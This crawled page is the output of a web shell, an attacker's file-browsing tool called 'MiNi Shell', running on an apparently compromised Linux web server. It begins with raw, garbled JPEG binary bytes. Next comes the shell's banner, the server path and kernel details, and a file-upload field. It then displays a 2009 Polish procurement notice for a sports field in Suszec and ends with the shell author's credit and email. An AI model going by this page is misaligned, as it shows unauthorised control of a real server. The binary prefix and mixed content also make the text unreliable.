JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090403/58557-N-2009.html

<p class="kh_header"><b>Suszec: Budowa boiska sportowego wraz z zapleczem w Suszcu, zgodnie z dokumentacją projektową.</b><br>
<b>Numer ogłoszenia: 58557 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suszec , ul. Lipowa 1, 43-267 Suszec, woj. śląskie, tel. 032 44993050, faks 032 4493051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suszec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska sportowego wraz z zapleczem w Suszcu, zgodnie z dokumentacją projektową..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zgodnie z treścią pkt 3 SIWZ:
Opis przedmiotu zamówienia:
3.1Przedmiotem zamówienia jest realizacja inwestycji pn.: Budowa boiska sportowego wraz z zapleczem w Suszcu, zgodnie z dokumentacją projektową, zwanej dalej zamówieniem.
3.2Przedmiot zamówienia obejmuje realizację 2 zadań, tj.: 
a)Zadanie nr 1 - budowa boiska sportowego w Suszcu wraz z zagospodarowaniem terenu,
b)Zadanie 2 - budowa zaplecza sportowego przy boisku w Suszcu (szatnie i pomieszczenia administracyjne).
3.3Zakres przedmiotu zamówienia obejmuje w szczególności:
a)Zadanie nr 1 - budowę boiska sportowego w Suszcu wraz z zagospodarowaniem terenu: wykonanie boiska do piłki nożnej o wymiarach 106,0 x 61,0 m o nawierzchni z trawy naturalnej na warstwie konstrukcyjnej z drenażem, boiska treningowego o wym. 87,0 x 52,0 m bez warstwy konstrukcyjnej i drenażu, trybun ziemnych na 420 miejsc siedzących, parkingu na 20 miejsc postojowych dla samochodów osobowych i 3 miejsca dla autokarów, wykonanie ogrodzenia,
b)Zadanie 2 - budowę budynku zaplecza boiska w Suszcu: budowę budynku zaplecza boisk wraz z wykonaniem wewnętrznej instalacji  wodociągowej, kanalizacji sanitarnej wraz z przyłączem, instalacji elektrycznej, alarmowej, odgromowej oraz kotłowni.
3.4Zamawiający oczekuje na dofinansowanie przedmiotu zamówienia z Regionalnego Programu Operacyjnego Województwa Śląskiego (RPO). W związku z powyższym, Zamawiający zastrzega sobie możliwość dokonania w każdym czasie, w trakcie realizacji zamówienia zmian harmonogramu, o którym mowa w § 2 pkt 3 istotnych postanowień umowy - zał. nr 2 do SIWZ i wprowadzenia w jego miejsce harmonogramu rzeczowo-finansowego, który stanowić będzie załącznik do podpisanej umowy dofinansowania. Na tę okoliczność Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie z harmonogramem rzeczowo-finansowym, stanowiącym załącznik podpisanej umowy dofinansowania. Zmiana harmonogramu nie będzie miała wpływu na fakturowanie robót. Etapy realizacji zamówienia, o których mowa w §2 pkt 3 istotnych postanowień umowy - zał. nr 2 do SIWZ nie ulegną zmianie.

3.5Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV): 

45212200-8	Roboty budowlane w zakresie budowy obiektów sportowych
45231300-8	Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzenia ścieków	
45233222-1	Roboty budowlane w zakresie układania chodników i asfaltowania
45340000-2	Instalowanie ogrodzeń, płotów i sprzętu ochronnego
45100000-8	Przygotowanie terenu pod budowę
45200000-9	Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45300000-0	Roboty instalacyjne w budynkach
45400000-1	Roboty wykończeniowe w zakresie obiektów budowlanych
3.6 Szczegółowy opis przedmiotu zamówienia stanowią:
a)formularz przedmiaru na zadanie 1, dot. budowy boiska sportowego -  zał. A do SIWZ,
b)formularz przedmiaru robót na zadanie 2, dot. budowy budynku zaplecza -  zał. B do SIWZ,
c)dla zadania 1:
projekt budowlano-wykonawczy budowy boiska sportowego w Suszcu - zał. A.1,
d)dla zadania nr 2:
projekt konstrukcyjny - zał. B.1.1
projekt budowlano-wykonawczy (roboty ogólnobudowlane) - zał. B.1.2,
projekt budowlano-wykonawczy  (instalacja c.o.) - zał. B.1.3,
projekt budowlano-wykonawczy (wewnętrzna instalacja wodociągowa zimnej wody, ciepłej wody, cyrkulacji) - zał. B.1.4,
projekt budowlano-wykonawczy (instalacja wewnętrzna kanalizacji sanitarnej wraz z przyłączem) - zał. B.1.5,
projekt budowlano-wykonawczy (przyłącze wodociągowe wraz z zewnętrzną siecią hydrantową) - zał. B.1.6,
projekt budowlano-wykonawczy (kotłownia gazowa) - zał. B.1.7,
projekt budowlano-wykonawczy (instalacje elektryczne) - zał. B.1.8,
e)projekt czasowej zmiany organizacji ruchu - zał. 6,
f)projekt docelowej zmiany organizacji ruchu - zał. 7,
g)informacja BIOZ - zał. 8.
i zwane są w dalszej treści SIWZ dokumentacją projektową oraz:
h)dla zadania 1:
specyfikacja techniczna wykonania i odbioru robót  - boiska sportowe - A.2,
i)dla zadania nr 2:
specyfikacja techniczna wykonania i odbioru robót (roboty ogólnobudowlane) - zał. B.2.1, 
specyfikacja techniczna wykonania i odbioru robót (wewnętrzna instalacja c. o.) - zał. B.2.2, 
specyfikacja techniczna wykonania i odbioru robót (wewnętrzna instalacja wodociągowa zimnej wody, ciepłej wody, cyrkulacji) - zał. B.2.3, 
specyfikacja techniczna wykonania i odbioru robót (wewnętrzna instalacja kanalizacji sanitarnej wraz z przyłączem kanalizacji) - zał. B.2.4, 
specyfikacja techniczna wykonania i odbioru robót (przyłącze wodociągowe wraz z zewnętrzną siecią hydrantową) - zał. B.2.5, 
specyfikacja techniczna wykonania i odbioru robót (kotłownia gazowa wbudowana) - zał. B.2.6, 
specyfikacja techniczna wykonania i odbioru robót (instalacja elektryczna) - zał. B.2.7.

Uwaga:
Przedstawione w w.w dokumentacji projektowej oraz w specyfikacjach technicznych wykonania i odbioru robót wskazania na urządzenia techniczne i materiały z podaniem producenta, należy traktować jako przykładowe, ze względu na zasady ustawy prawo zamówień publicznych, a zwłaszcza art. 29. Oznacza to, że wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. nie gorszych niż wskazane w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót, parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem projektu, z zapewnieniem uzyskania przez wykonawcę i na jego koszt  wszelkich ewentualnych uzgodnień, w tym w razie potrzeby autora dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.20.00.00-9, 45.23.13.00-8, 45.23.32.22-1, 45.34.00.00-2, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości:
a)na zadanie 1: 	35.000,00 zł.
b)na zadanie 2:	15.000,00 zł.
Wykonawca wnosi wadium odrębnie dla każdego zadania, na które składa ofertę.
Wadium musi być wniesione przed upływem terminu składania ofert, tj. do dnia 27.04.2009r. do godz. 10:00. W przypadku wnoszenia wadium w pieniądzu (tylko w formie przelewu), termin zostanie zachowany, jeżeli bank prowadzący rachunek zamawiającego potwierdzi, że zaksięgował taki przelew przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku formach, określonych  w art. 45 ust. 6 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z pkt 8 SIWZ:
Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków. Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania tych warunków.

8.1 O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
8.2 Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny tych warunków:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert:
-	dokument musi potwierdzać, że profil działalności wykonawcy odpowiada przedmiotowi zamówienia oraz, że wykonawca jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi,
-	w przypadku składania oferty przez wspólników spółki cywilnej, należy dołączyć poza zaświadczeniami o wpisie do ewidencji działalności gospodarczej wszystkich wspólników spółki, wypis z umowy spółki cywilnej, w celu określenia sposobu reprezentacji spółki lub uchwałę wspólników regulującą sposób reprezentacji spółki (jeżeli w ten sposób został określony),
-	do wypisu z rejestru lub zgłoszenia do ewidencji działalności gospodarczej należy dołączyć pełnomocnictwo, jeżeli zostało ustanowione, określające zakres i sposób reprezentacji, zgodnie z pkt 8.6 niniejszej SIWZ,
b)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert:
-	dotyczy tylko podmiotów zbiorowych, 
d)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e)	oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z treścią zał. nr 3,
f)  wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z   podaniem   ich   wartości oraz daty i miejsca wykonania oraz załączenia dokumentów (np. referencje, opinie, protokoły odbioru) potwierdzających, że roboty te zostały wykonane należycie, zgodnie z zał. nr 4:
wymagane minimum:
dla zadania 1:	wykonawcy wykażą, że w ciągu ostatnich pięciu lat wykonali co najmniej jedną robotę budowlaną polegającą na budowie boiska sportowego do piłki nożnej o nawierzchni z trawy naturalnej o wymiarach płyty boiska min. 45m x 90m wraz z zagospodarowaniem terenu (np. wykonanie ogrodzenia, trybun, chodników itp.) oraz o wartości nie mniejszej niż wartość ceny ofertowej brutto, złożonej przez wykonawcę w przedmiotowym zamówieniu. Do wykazu wykonawca jest zobowiązany załączyć stosowne dokumenty potwierdzające należyte wykonanie robót. Dla wykonawców składających wspólną ofertę, np. w konsorcjum, powyższy warunek oznacza, że przynajmniej jeden z członków konsorcjum musi wykazać żądaną robotę, spełniającą w pełnej rozciągłości wymagany warunek co do  zakresu i wartości zamówienia,
dla zadania 2: wykonawcy wykażą, że w ciągu ostatnich pięciu lat wykonali co najmniej jedną robotę budowlaną polegającą na budowie obiektów użyteczności publicznej tj. budynków wymienionych w dziale 12 Polskiej Klasyfikacji Obiektów Budowlanych, oraz o wartości nie mniejszej niż wartość ceny ofertowej brutto, złożonej przez wykonawcę w przedmiotowym zamówieniu. Do wykazu wykonawca jest zobowiązany załączyć stosowne dokumenty potwierdzających należyte wykonanie robót. Dla wykonawców składających wspólną ofertę, np. w konsorcjum, powyższy warunek oznacza, że przynajmniej jeden z członków konsorcjum musi wykazać żądaną robotę, spełniającą w pełnej rozciągłości wymagany warunek co do  zakresu i wartości zamówienia.
g)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,  na lub zgodnie z zał. nr 5:
wymagane minimum: wykonawca do realizacji przedmiotowego zamówienia musi dysponować co najmniej: jedną osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń (bez względu na ilość zadań, na które wykonawca składa ofertę),
osoby, które posiadają uprawnienia nadane w innym brzmieniu niż w tiret poprzedzajacym, na podstawie wcześniej obowiązujących przepisów, odpowiadające uprawnieniom wymaganym w postępowaniu, są zobowiązani do załączenia zaświadczenia z właściwej izby samorządu zawodowego, potwierdzającego, że wykonawca  posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń,
do wykazu wykonawca jest zobowiązany dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie (zał. nr 5), wykonawca wskazał osoby, którymi będzie dysponował,
-	dla wykonawców składających wspólną ofertę, np. w konsorcjum, powyższy warunek oznacza, że przynajmniej jeden z członków konsorcjum musi wykazać min. 1 osobę, spełniającą wymagany warunek, 
h)dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, wymienione w zał. nr 5 do SIWZ, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń,, wymagane przepisami ustawy Prawo budowlane, z zastrzeżeniem lit. g tiret drugi,
dla osoby wymienionej w zał. nr 5 wykonawca jest zobowiązany załączyć aktualne w dniu otwarcia ofert zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego (warunek konieczny do posługiwania się wymaganymi uprawnieniami, zgodnie z przepisami ustawy Prawo budowlane).

8.3Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 8.2 lit. a, b, c, d, składa dokumenty zgodnie z postanowieniami pgf. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. 

8.4 Pozostałe wymagania do udziału w postępowaniu:
a)	udzielenie 60 - miesięcznej gwarancji na wykonany przedmiot zamówienia,
oświadczenie w celu potwierdzenia spełniania w.w warunku zawiera formularz oferty, zał. nr 1, 
b)złożenie wypełnionego druku formularza oferty, zgodnie z treścią zał. nr 1 do SIWZ, w tym m.in. złożenie oświadczenia o udziale podwykonawców w realizacji zamówienia oraz wskazania części zamówienia, których wykonanie zostanie powierzone podwykonawcom,
c)złożenie wypełnionych załączników A i,lub B do formularza oferty, zgodnie z opisem określonym w pkt. 15 SIWZ, w zależności od tego, na które zadanie wykonawca składa ofertę.

8.5 Zamawiający dokona oceny spełniania warunków wymaganych od wykonawców w oparciu o wyżej wymienione dokumenty. Ocena ta zostanie przeprowadzona wg formuły: spełnia - nie spełnia. 
Nie spełnienie któregokolwiek warunku określonego w pkt 8, będzie skutkować wykluczeniem wykonawcy z postępowania bądź odrzuceniem oferty.

8.6Dokumenty, o których mowa w pkt 8.2, 8.3 i 8.4 muszą być przedstawione w formie oryginału, lub kopii poświadczonej (na każdej zapisanej stronie kopii) za zgodność z oryginałem przez wykonawcę, z zastrzeżeniem pkt 8.7 SIWZ. Za konieczne a jednocześnie wystarczające będzie złożenie na kopii własnoręcznego                              podpisu poprzedzonego dopiskiem: za zgodność, przez osobę(-y) uprawnioną(-e) do składania oświadczeń woli w imieniu wykonawcy. 
Za osoby uprawnione do składania oświadczeń woli w imieniu wykonawców uznaje się osoby wymienione jako uprawnione do składania oświadczeń woli:
a)w prowadzonych przez sądy rejestrach, 
b)w Ewidencji Działalności Gospodarczej, 
c)osoby  legitymujące się odpowiednim pełnomocnictwem:
w przypadku podpisania oferty przez pełnomocnika wykonawcy, pełnomocnictwo określające zakres reprezentacji, musi być dołączone do oferty,
w przypadku złożenia pełnomocnictwa, pełnomocnictwo musi być złożone w formie oryginału lub kopii potwierdzonej notarialnie,
d)w umowie (dot. spółki cywilnej) lub uchwale wspólników.
Dokumenty winny być ułożone w kolejności jw.

8.7Wypełnione załączniki nr 1, A, B, 3, 4 i 5 do SIWZ należy złożyć w oryginale..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> j.w..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.suszec.iap.pl/6585,13376,14082/14082/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suszec
ul. Lipowa 1 
43-267 Suszec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 10:00, miejsce: Urząd Gminy Suszec
ul. Lipowa 1 
43-267 Suszec
sekretariat I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający złożył wniosek do Regionalnego Programu Operacyjnego Województwa śląskiego (na lata 2007-2013) o dofinansowanie projektu obejmującego przedmiot zamówienia - wniosek w trakcie rozpatrywania..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - budowa boiska sportowego w Suszcu wraz z zagospodarowaniem terenu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - budowę boiska sportowego w Suszcu wraz z zagospodarowaniem terenu: wykonanie boiska do piłki nożnej o wymiarach 106,0 x 61,0 m o nawierzchni z trawy naturalnej na warstwie konstrukcyjnej z drenażem, boiska treningowego o wym. 87,0 x 52,0 m bez warstwy konstrukcyjnej i drenażu, trybun ziemnych na 420 miejsc siedzących, parkingu na 20 miejsc postojowych dla samochodów osobowych i 3 miejsca dla autokarów, wykonanie ogrodzenia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.23.13.00-8, 45.23.32.22-1, 45.34.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - budowa zaplecza sportowego przy boisku w Suszcu (szatnie i pomieszczenia administracyjne).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - budowę budynku zaplecza boiska w Suszcu: budowę budynku zaplecza boisk wraz z wykonaniem wewnętrznej instalacji  wodociągowej, kanalizacji sanitarnej wraz z przyłączem, instalacji elektrycznej, alarmowej, odgromowej oraz kotłowni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com